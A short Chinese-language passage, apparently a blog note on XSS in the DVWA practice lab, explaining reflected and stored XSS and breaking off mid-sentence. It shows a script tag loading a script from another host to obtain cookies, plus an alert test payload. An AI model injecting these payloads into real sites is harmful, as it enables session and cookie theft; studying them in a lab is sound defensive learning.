DVWA之XSS思路

跨站腳本攻擊 Xss是對客戶端形成危害 最多見的XSS類型: 反射型和存儲型 反射型不會存儲,只能引導用戶去點擊 存儲型會保存到服務器中 原理: 反射型: 向服務器中提交js惡意代碼 誘導其餘用戶去訪問js惡意代碼 <script src='其餘主機的某個腳本文件/xx.js'></script> 得到cookie <script>alert('aaa')</script> 存儲型: 向
相關文章
相關標籤/搜索